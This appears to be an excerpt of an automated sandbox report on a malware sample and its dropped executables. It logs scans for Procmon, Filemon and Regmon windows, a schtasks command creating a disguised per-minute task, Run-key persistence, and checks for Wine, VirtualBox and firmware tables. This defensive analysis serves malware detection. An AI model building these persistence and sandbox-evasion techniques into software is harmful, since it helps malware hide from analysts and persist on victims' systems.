Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph

Source: C:\Program Files\Windows Media Player\graph\graph.exe	Registry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Registry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Registry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Registry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Registry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Registry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess	graph_6-10154
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess	graph_2-9741
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess	graph_5-12161

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
